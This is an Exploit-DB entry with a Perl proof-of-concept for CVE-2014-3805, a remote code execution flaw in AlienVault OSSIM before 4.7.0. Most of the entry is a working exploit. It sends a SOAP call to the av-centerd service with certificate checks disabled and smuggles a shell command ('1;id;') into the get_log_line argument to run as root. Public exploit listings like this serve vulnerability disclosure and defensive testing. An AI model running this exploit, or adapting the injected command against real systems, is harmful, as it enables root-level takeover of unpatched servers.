Alienvault Open Source SIEM (OSSIM) < 4.7.0 - av-centerd 'get_log_line()' Remote Code Execution

Author: Alfredo Ramirez
type: remote
platform: linux
port: 
date_added: 2014-06-25  
date_updated: 2016-12-16  
verified: 1  
codes: CVE-2014-3805;OSVDB-108008;OSVDB-107993;OSVDB-107992  
tags:   
aliases:   
screenshot_url: http://www.exploit-db.com/screenshots/idlt34000/screen-shot-2014-07-05-at-72523-pm.png  
application_url:   

raw file: 33805.pl  
# Exploit Title: AlienVault OSSIM < 4.7.0 av-centerd 'get_log_line()' Remote Code Execution
# Date: 06/17/2014
# Exploit Author: Alfredo Ramirez
# Vendor Homepage: http://www.alienvault.com/
# Software Link: http://www.alienvault.com/open-threat-exchange/projects
# Version: < 4.7.0
# Tested on: Debian/Virtual Appliance
# CVE : CVE-2014-3805

 #!perl -w

  use SOAP::Lite;

  # SSL is self-signed so we have to ignore verification.
  $ENV{PERL_LWP_SSL_VERIFY_HOSTNAME}=0;

  # We simply append the 'id' command to the number of log we want to
  # read.
  @soap_response = SOAP::Lite
    -> uri('AV/CC/Util')
    -> proxy('https://172.26.22.2:40007/av-centerd')
    -> get_log_line('All', '423d7bea-cfbc-f7ea-fe52-272ff7ede3d2' ,'172.26.22.1', 'test', '/var/log/auth.log', '1;id;')
    -> result;

  for (@{ $soap_response[0] }) {
   print "$_\n";
  }

  # If vulnerable output will be: uid=0(root) gid=0(root) groups=0(root)